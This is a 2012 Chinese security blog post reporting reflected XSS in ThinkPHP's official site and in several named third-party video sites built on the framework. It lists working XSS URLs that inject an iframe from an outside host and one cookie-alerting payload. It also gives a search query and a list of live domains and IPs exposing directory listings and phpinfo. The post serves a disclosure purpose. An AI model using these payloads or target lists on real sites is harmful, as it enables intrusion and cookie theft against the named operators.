不灭的焱

革命尚未成功,同志仍须努力下载JDK17

ThinkPHP框架XSS漏铜,ThinkPHP官网XSS漏洞
作者:Albert.Wen  添加时间:2012-06-28 13:32:41  修改时间:2024-05-13 10:48:37  分类:编程基础/Web安全  编辑

ThinkPHP是一款中文PHP框架,近年在各种场合应用频繁。

它自己在产品性能中提到了防XSS功能,但不如所愿,自己的官网有非持久型XSS。

http://thinkphp.cn/search-index.html?k=%22/%3E%3C/title%3E%3Ciframe%20src=httP://tmxk.org%3E%3C/iframe%3E

同时,thinkphp导致很多网站列目录,谷歌  index of  thinkphp/tpl 就可以搜到一大片。

其中,有有一个视频播放网站系统使用thinkphp,结果导致这类网站列目录+XSS。

XSS举例:

http://vod.002dh.cn/index.php?s=vod-search-x-area-id-%3C/title%3E%3Ciframe%20src=httP://tmxk.org%3E%3C/iframe%3E

http://www.kb210.com/index.php?s=vod-search-x-area-id-%3C/title%3E%3Ciframe%20src=httP://tmxk.org%3E%3C/iframe%3E

http://peng.9.je/?s=vod-search-x-area-id-%3C/title%3E%3Ciframe%20src=httP://tmxk.org%3E%3C/iframe%3E

http://www.skyuer.cn/?s=vod-search-x-area-id-%3C/title%3E%3Ciframe%20src=httP://tmxk.org%3E%3C/iframe%3E

http://dy.bxw.so/?s=vod-search-x-area-id-%3C/title%3E%3Ciframe%20src=httP://tmxk.org%3E%3C/iframe%3E

http://d.hunanz.com/b.php?wk=%22/%3E%3C/title%3E%3Ciframe%20src=httP://tmxk.org%3E%3C/iframe%3E

http://www.8tiny.com/source/thinkphp/nav.html?http://tmxk.org

http://www.hahabei.com/SearchPlayFile.aspx?’%20onmouseover=javascript:alert(document.cookie)%3E

列目录举例(有的直接拿权限):

http://www.114xia.com/ThinkPHP/

http://zgcwmh.mobi/ThinkPHP/

http://xiaoyuanji.com/ThinkPHP/Tpl/

http://124.108.44.68/

http://124.108.44.68/phpinfo.php

http://tj.bailitop.com/ThinkPHP/Tpl/Autoindex/

http://220.160.56.24:8066/fsesvod/ThinkPHP/

http://fzh.fz591.org/mobile/

http://xiaoy.me/admin/ThinkPHP/

http://116.255.143.227/tuan_old/

Copyright © 2012-2035 不灭的焱 版权所有 粤ICP备17073848号